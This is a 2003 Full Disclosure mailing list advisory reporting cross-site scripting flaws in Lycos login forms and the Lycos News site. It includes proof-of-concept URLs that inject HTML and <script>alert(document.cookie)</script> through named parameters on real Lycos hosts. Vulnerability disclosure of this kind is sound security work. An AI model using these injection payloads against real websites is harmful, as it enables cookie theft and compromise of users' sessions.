Full Disclosure mailing list archives
Lycos Authenticating Systems and Lycos News server Vulnerabilities
From: "Lorenzo Hernandez Garcia-Hierro" <novappc () novappc com>
Date: Sat, 14 Jun 2003 16:48:05 +0200
--------------- Systems affected: Lycos authenticating servers ,Login forms, Lycos News Site Risk: 7 Type of errors: Input Validation Flaw --------------- I encountered security holes in the Lycos Authentication servers . These servers are affected by multiple Cross Site Scripting attacks .The hole is in the form that the login cgi program makes the final lofin form , injecting a final tag like "> in the m_CBURL variable you can inject html and script in the login form. In addition i encountered security holes in the Lycos News server related to XSS attacks. ------------- EXPLOITS / PROOFS OF CONCEPT ------------- http://ldbauth.lycos.com/cgi-bin/mayaLogin?m_CBURL=">[HERE COMES YOUR XSS ATTACK CODE] http://news.lycos.com/news/photo.asp?section=BreakingPhotos&photoId=352417"> [XSS ATTACK CODE] ------------ SAMPLES ------------ http://news.lycos.com/news/photo.asp?section=BreakingPhotos&photoId=352417"> <H1>xss in Lycos WebSites</h1> http://news.lycos.com/news/photo.asp?section=BreakingPhotos&photoId=352417"> <script>alert(document.cookie);</script> http://news.lycos.com/news/photo.asp?section=BreakingPhotos&photoId=352417"> <iframe></iframe> http://ldbauth.lycos.com/cgi-bin/mayaLogin?m_CBURL="><h1>XSS in Lycos Authenticating Servers</h1><a href=" http://ldbauth.lycos.com/cgi-bin/mayaLogin?m_CBURL="><script>alert(document. cookie);</script> ------------------------------------------------------ Lorenzo Hernandez Garcia-Hierro --- Computer Security Analyzer --- --Nova Projects Professional Coding-- PGP: Keyfingerprint B6D7 5FCC 78B4 97C1 4010 56BC 0E5F 2AB2 ID: 0x9C38E1D7 ********************************** www.novappc.com security.novappc.com www.lorenzohgh.com ______________________ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- Lycos Authenticating Systems and Lycos News server Vulnerabilities Lorenzo Hernandez Garcia-Hierro (Jun 14)